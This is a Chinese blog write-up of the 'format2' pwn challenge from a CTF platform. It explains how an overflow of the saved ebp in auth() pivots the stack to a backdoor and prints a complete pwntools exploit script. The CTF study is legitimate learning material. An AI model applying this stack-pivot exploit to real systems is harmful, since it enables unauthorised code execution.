攻防世界PWN之format2题解

最新推荐文章于 2022-03-08 20:15:00 发布
最新推荐文章于 2022-03-08 20:15:00 发布
阅读量688 收藏 2
点赞数 3
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 逆向工程 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/102997144
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

format2(整数地址空间溢出)

本题需要细心

首先,检测一下程序保护机制

虽然说开启了CANARY,但是关键的几个函数没有开启这个机制,这道题因为libc库静态链接到文件里,所以才造成这种干扰。

我们用IDA分析一下

后门函数

溢出点在这,memcpy传入的是v4的地址,而v4int,最多也就8字节,因此这里可以溢出

程序的流程是将我们输入的字符串进行BASE64解密后,再调用auth函数验证,成功就执行shell。但是auth函数存在溢出漏洞

我们再看看auth的汇编代码

auth的函数的栈布局是这样的

0x4字节(esp)

栈顶

………..

0x8字节(ebp-0x8)

存储着v4的值

0x4字节(ebp)

(栈底) 存储着上一个函数(main)的ebp

0x4字节(ebp + 0x4)

auth的返回地址

并且主函数里做了判断base64解密后的长度不能大于12

也就是说,我们的payload长度最长为12,我们可以溢出v4 到后面4个字节,也就是会覆盖authebp的内容

我们知道,main进入auth函数时,是这样的

  1. push ebp  
  2. mov esp,ebp  
  3. sub esp,0x28  

而退出auth函数时,即执行leave指令时,是这样的

  1. mov esp,ebp  
  2. pop ebp  

也就是说,authebp存的内容为mainebp

当退出auth函数时,ebp被复原为main函数的ebp,了解更多请学习汇编

 

那么,如果我们溢出,把auth的ebp处写为input的地址会怎么样?

为了便于分析,我们的input存入如下内容aaaabbbbcccc

那么auth依然正常退出到main,但是mainebp变成了ccccmain要退出时,执行leave指令mov esp,ebp

esp变成了cccc,那么pop ebp就使得ebp = [cccc],

接下来,retn 即执行call [cccc+ 4]

因此,我们把bbbb改成我们的getshell的地址,把cccc改成input_addr,那么我们就能get shell。

综上,我们的exp脚本如下

  1. #coding:utf8  
  2. from pwn import *  
  3. import base64  
  4.   
  5. context.log_level = 'debug'  
  6. sh = process('./pwnh19')  
  7. #sh = remote('111.198.29.45',49124)  
  8. elf = ELF('./pwnh19')  
  9. #bss段的input区域  
  10. input_addr = elf.sym['input']  
  11. getshell_addr = elf.sym['correct'] + 0x19  
  12.   
  13. sh.recvuntil('Authenticate :')  
  14.   
  15. #覆盖auth函数的ebp内容,也就是修改了上一个函数的ebp,使得上一个函数(main)ebp指向了input_addr  
  16. #那么,当main函数leave时,有  
  17. #mov esp,ebp  ;esp = input_addr  
  18. #pop ebp  ;ebp = aaaa  
  19. #retn ; call getshell_addr  
  20. payload = 'a'*4 + p32(getshell_addr) + p32(input_addr)  
  21.   
  22. sh.sendline(base64.b64encode(payload))  
  23.   
  24. sh.interactive() 
ha1vk
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xctf format2
doudoudedi
10-01 293
日常水题的一天这个和pwnable.kr 上的一道题很像也是一道栈迁移的题目 我们直接看main函数 把输入的base64解密长度不能超过12 目的是correct函数 发现这里可以覆盖ebp我们就可以将栈迁移到input处然后mov esp,ebp ; pop ebp; pop eip;main函数公用ebp控制eip为我们的后门地址直接拿到shell(打pwn不要限制于拿到shell哦...
攻防世界-PWN-Format2解题过程
aptx4869_li的博客
07-24 414
# 解题思路 ## 安全机制检查 ``` healer@kali:~/Desktop/format1$ readelf -h format1 ELF Header: Magic: 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, little endian ...
format2(xctf)
weixin_43868725的博客
09-02 578
0x0 程序保护和流程 保护: 流程: main() 接收一个最长为30的字符串,通过base64解密后长度小于12就会将解密后的字符串复制到input处,之后调用auth()。 在将input中的字符串复制到v4的时候存在四个字节的溢出。如果返回值为1的话就会进入correct()。 此时如果input==0xDEADBEEF的话就能够getshell了。 0x1 利用过程 1.虽然checksec提示说程序开启了canary但是在主要逻辑上的函数都没有开启canary,所以可以进行溢出。 2.因
format2 攻防世界
qq_41071646的博客
07-15 660
这个题 确实很恶心 本来感觉应该是栈溢出 或者 直接验证 但是 md5 解不开 然后调试的时候逐渐发现问题 晕死,, 虽然长度那个变量是 无符号 但是 输入字符限定 30 我们也没有什么办法 来通过 这个来操作 然后进入check 函数 发现v4 可以 溢出修改ebp 并且这里有后门函数 ebp ebp ebp 栈转移 两个 leave ...
攻防世界pwnformat2
qq_42728977的博客
12-11 459
原理: 栈溢出、后门 环境: ubuntu14 工具: pwntools 、IDA 步骤: 查看程序的基本信息: 可以看出程序是32位,斌开了canary和nx 在IDA进行分析查看 看到程序并没有canary的压栈,我当时很奇怪为什么,让你后又看了几个函数,发现也没有,后来看大佬的 WP说是部分函数有,这里的canary是个迷惑。这没有canary就方便很多了。 一点一点看,发现这就是一个...
pwn 练习笔记 format2
SsMing的博客
08-16 297
例子是protostar format2 源码为: 和昨天的思路一样,确定要通过格式化字符串洞覆盖target的内容,题目的目的是要让target等于64 1.找到target的地址 2.计算偏移量 先起手个200个 我们发现第四个就是我们的ABCD,所以改一下payload 然后要是target的值为64 ,在括号之前要有64个字符,这里前面已经有34个,还差30个...
[XCTF-pwn] 22_format2
weixin_52640415的博客
03-08 207
移栈 一个移栈的小题,1:没开pie而且输入的内容放在bss中地址已知,2:程序的correct给了后门,虽然不能直接运行到但可以当后门用,3:auth函数将解码后的input复制到v4,而v4定义是ebp-8当输入大于8里就会溢出到ebp int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp+18h] [ebp-28h] BYREF char s[30]; // [esp+1Eh]
CTF训练(PWN)——format_secret
weixin_49270591的博客
04-12 451
CTF训练(PWN)——format_secret 这次拿到的是一道pwn题,作为新手只能慢慢学习(啊啊啊啊,pwn是真的难~~) 读题 根据描述,知道是格式化字符串漏洞,于是去度娘了解一下格式化字符串漏洞是什么??? 这里附上来自同站大佬的链接:https://blog.csdn.net/qq_43394612/article/details/84900668 分析题目 首先下载附件 拿到一个意义不明的白色文件 解题 首先使用checksec进行查看 没有的话可以使用git进行安装 git clone
pwn 练习笔记 format4
SsMing的博客
09-18 362
protostar format4 日常练习,源码为 #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int target; void hello() { printf("code execution redirected! y...
某道Pwn(格式化字符串漏洞
热门推荐
龙哥盟
03-18 4万+
格式化字符串漏洞近几年出现频率少了,但是一些 CTF 中还有涉及,就当玩玩好了。首先看这一段代码,什么比赛的题我忘了:#include <stdio.h> int main(void) { int flag = 0; int *p = &flag; char a[100]; scanf("%s",a); printf(a); if(flag ==
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
pwn07.ret2syscall例题
11-11
ret2syscall例题
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
入门pwn题目ret2text
03-26
入门pwn题目ret2text
2018 百越杯 pwn(format WriteUp)
X丶 的博客
12-03 776
看到题目的内容,就知道大概是格式化漏洞了, 马上扔到IDA看个究竟。 不出所料,就是printf的格式化输出漏洞   思路: 1、利用格式化漏洞覆盖任意地址的值,这里我们需要覆盖secret的值,所以先要找到secret的地址,在IDA中,可以看到secret在bss段: 得到secret的地址后,我们就可以对它的值进行覆盖,覆盖成192 2、利用%k$n(k$用于获取格式化...
pwn-Format String之hijack GOT
admin的博客
10-07 347
题目来源:ctf-wiki的hijack GOT。 例子 - CTF Wiki (ctf-wiki.org) CTF上的wp有点简洁,复现的时候遇到很多小问题,在这里记录一下。 ①、checksec和IDA 程序的主干代码:没必要一次性看完,下面我们一点一点分析 //main int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { signed int v3; // eax cha..
攻防世界逆向wp
一筐萝卜的博客
05-14 4628
reverse-box 在平台上题目描述不全,少了一个重要的提示信息 原题题目描述 $ ./reverse_box ${FLAG} 95eeaf95ef94234999582f722f492f72b19a7aaf72e6e776b57aee722fe77ab5ad9aaeb156729676ae7a236d99b1df4a 也就是说,当输入争取的flag的时候,程序应该输出的是这一个字符串(如果...
2019XCTF攻防世界之萌新入坑(time_formatter)
weixin_44113469的博客
04-11 1879
time_formatter
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值